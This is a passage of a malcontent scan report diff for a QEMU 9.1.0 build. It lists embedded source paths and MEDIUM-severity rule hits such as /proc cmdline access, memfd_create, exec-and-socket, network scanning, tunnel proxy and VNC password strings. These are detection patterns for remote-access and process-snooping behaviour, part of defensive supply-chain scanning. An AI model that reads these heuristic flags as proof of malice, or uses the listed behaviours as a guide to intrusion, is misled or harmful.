[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/core/cpu.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcore%2Fcpu.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/core/generic-lo](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcore%2Fgeneric-lo&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/core/resetconta](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcore%2Fresetconta&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/cpu/cluster.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcpu%2Fcluster.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/cpu/core.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcpu%2Fcore.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/display/i2c-ddc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fdisplay%2Fi2c-ddc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/elf_ops.h.inc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Felf_ops.h.inc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/fw-path-provide](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Ffw-path-provide&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/hotplug.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fhotplug.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/i2c/i2c.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fi2c%2Fi2c.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ahci-pci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fahci-pci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ahci-sysbus](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fahci-sysbus&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ide-bus.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fide-bus.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ide-dev.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fide-dev.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/intc/intc.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fintc%2Fintc.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ipack/ipack.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fipack%2Fipack.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/misc/vmcoreinfo](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fmisc%2Fvmcoreinfo&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/nmi.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fnmi.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/nvram/fw_cfg.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fnvram%2Ffw_cfg.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci-host/gpex.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci-host%2Fgpex.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci_bridge.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci_bridge.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci_device.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci_device.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci_host.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci_host.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pcie_host.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpcie_host.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pcie_port.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpcie_port.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/qdev-core.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fqdev-core.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/resettable.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fresettable.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/scsi/esp.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fscsi%2Fesp.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/scsi/scsi.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fscsi%2Fscsi.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/sd/sd.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fsd%2Fsd.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/sd/sdhci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fsd%2Fsdhci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/sysbus.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fsysbus.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/usb.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fusb.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/usb/imx-usb-phy](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fusb%2Fimx-usb-phy&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/usb/msd.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fusb%2Fmsd.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/vfio/vfio-commo](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvfio%2Fvfio-commo&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/vfio/vfio-conta](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvfio%2Fvfio-conta&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vdpa-dev](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvdpa-dev&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vhost-sc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvhost-sc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vhost-us](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvhost-us&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vhost-vs](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvhost-vs&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-b](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-b&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-c](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-c&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-g](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-g&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-i](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-i&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-n](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-n&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-p](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-p&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-r](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-r&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-s](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-s&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/vmstate-if.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvmstate-if.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-buffer.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-buffer.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-command](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-command&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-file.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-file.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-null.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-null.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-socket.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-socket.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-tls.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-tls.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-websock](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-websock&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/dns-resolver.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fdns-resolver.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/net-listener.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fnet-listener.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/net/can_host.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fnet%2Fcan_host.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/net/filter.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fnet%2Ffilter.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qapi/qmp/qobject.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqapi%2Fqmp%2Fqobject.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/bitops.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fbitops.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/bswap.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fbswap.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/coroutine.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fcoroutine.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/int128.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fint128.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/iov.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fiov.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/lockable.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Flockable.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/main-loop.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fmain-loop.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/range.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Frange.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/ratelimit.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fratelimit.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/rcu.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Frcu.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/thread-contex](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fthread-contex&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qom/object_interfa](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqom%2Fobject_interfa&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/scsi/pr-manager.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fscsi%2Fpr-manager.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/accel-ops.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Faccel-ops.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/cryptodev.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fcryptodev.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/event-loop-](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fevent-loop-&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/host_iommu_](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fhost_iommu_&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/hostmem.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fhostmem.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/iothread.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fiothread.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/rng-random.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Frng-random.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/rng.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Frng.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/tpm.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Ftpm.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/tpm_backend](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Ftpm_backend&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/vhost-user-](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fvhost-user-&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/ui/console.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fui%2Fconsole.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/ui/dbus-display.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fui%2Fdbus-display.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/ui/qemu-spice.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fui%2Fqemu-spice.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/migration/channel-block.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Fmigration%2Fchannel-block.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/tcg/i386/tcg-target.c.inc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Ftcg%2Fi386%2Ftcg-target.c.inc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/trace/control-internal.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Ftrace%2Fcontrol-internal.h&type=code) | +| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | +| MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%d/cmdline](https://github.com/search?q=%2Fproc%2F%25d%2Fcmdline&type=code) | +| MEDIUM | [fs/proc/pid_cmdline](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/pid-cmdline.yara#proc_cmdline) | access command-line of other processes | [/proc/%d/cmdline](https://github.com/search?q=%2Fproc%2F%25d%2Fcmdline&type=code) | +| MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) | +| MEDIUM | [hw/dev/block_ice](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/dev/block-device.yara#block_devices) | works with block devices | [/dev/block/%u](https://github.com/search?q=%2Fdev%2Fblock%2F%25u&type=code)
[/sys/dev/block](https://github.com/search?q=%2Fsys%2Fdev%2Fblock&type=code) | +| MEDIUM | [impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent) | references an 'agent' | [vdagent](https://github.com/search?q=vdagent&type=code) | +| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [06zu:qmp_enter_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_enter_x_colo_lost_heartbeat&type=code)
[06zu:qmp_exit_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_exit_x_colo_lost_heartbeat&type=code)
[Tell COLO that heartbeat is lost](https://github.com/search?q=Tell+COLO+that+heartbeat+is+lost&type=code)
[hmp_x_colo_lost_heartbeat](https://github.com/search?q=hmp_x_colo_lost_heartbeat&type=code)
[qmp_marshal_x_colo_lost_heartbeat](https://github.com/search?q=qmp_marshal_x_colo_lost_heartbeat&type=code)
[qmp_x_colo_lost_heartbeat](https://github.com/search?q=qmp_x_colo_lost_heartbeat&type=code) | +| MEDIUM | [impact/remote_access/net_exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_exec.yara#exec_chdir_and_socket) | exec chdir and socket | [chdir](https://github.com/search?q=chdir&type=code)
[execve](https://github.com/search?q=execve&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Port](https://github.com/search?q=Port&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[Target](https://github.com/search?q=Target&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | +| MEDIUM | [mem/anonymous_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/mem/anonymous-file.yara#memfd_create) | create an anonymous file | [memfd_create](https://github.com/search?q=memfd_create&type=code) | +| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | +| MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [258EAFA5-E914-47DA-95CA-C5AB0DC85B11](https://github.com/search?q=258EAFA5-E914-47DA-95CA-C5AB0DC85B11&type=code)
[WebSocket](https://github.com/search?q=WebSocket&type=code) | +| MEDIUM | [net/ip/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping 0x](https://github.com/search?q=ping+0x&type=code) | +| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | +| MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntoa](https://github.com/search?q=inet_ntoa&type=code) | +| MEDIUM | [net/proxy/tunnel](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/proxy/tunnel_proxy.yara#tunnel_proxy) | network tunnel proxy | [crypto](https://github.com/search?q=crypto&type=code)
[proxy](https://github.com/search?q=proxy&type=code)
[socket](https://github.com/search?q=socket&type=code)
[tunnel](https://github.com/search?q=tunnel&type=code) | +| MEDIUM | [net/remote_control/vnc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/remote_control/vnc.yara#vnc_user) | vnc user | [VNC_](https://github.com/search?q=VNC_&type=code)
[vnc_password](https://github.com/search?q=vnc_password&type=code) | +| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | listen on a socket | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
